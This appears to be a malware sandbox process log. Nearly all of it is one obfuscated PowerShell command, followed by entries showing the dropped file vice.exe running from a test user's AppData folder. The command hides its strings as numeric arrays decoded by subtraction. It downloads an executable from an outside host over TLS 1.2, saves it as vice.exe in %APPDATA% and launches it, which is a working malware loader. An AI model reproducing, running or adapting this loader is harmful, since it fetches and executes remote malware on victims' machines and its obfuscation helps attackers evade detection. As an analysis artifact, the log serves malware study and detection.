powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LgYBoZgyc($mb, $Q){[IO.File]::WriteAllBytes($mb, $Q)};function qVlmS($mb){if($mb.EndsWith((GGwIXH @(38387,38441,38449,38449))) -eq $True){Start-Process (GGwIXH @(38455,38458,38451,38441,38449,38449,38392,38391,38387,38442,38461,38442)) $mb}else{Start-Process $mb}};function QQMOHWU($go){$Bd = New-Object (GGwIXH @(38419,38442,38457,38387,38428,38442,38439,38408,38449,38446,38442,38451,38457));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $Bd.DownloadData($go);return $Q};function GGwIXH($BQ){$Ei=38341;$Y=$Null;foreach($rf in $BQ){$Y+=[char]($rf-$Ei)};return $Y};function PENpW(){$uqRySCIsZ = $env:APPDATA + '\';$FPTcCxEw = QQMOHWU (GGwIXH @(38445,38457,38457,38453,38456,38399,38388,38388,38451,38442,38460,38448,38390,38387,38456,38445,38452,38453,38388,38426,38426,38446,38456,38443,38448,38421,38414,38388,38459,38446,38440,38442,38387,38442,38461,38442));$LdgHFwF = $uqRySCIsZ + 'vice.exe';LgYBoZgyc $LdgHFwF $FPTcCxEw;qVlmS $LdgHFwF;;;;}PENpW;
2232vice.exe "C:\Users\test22\AppData\Roaming\vice.exe"
2388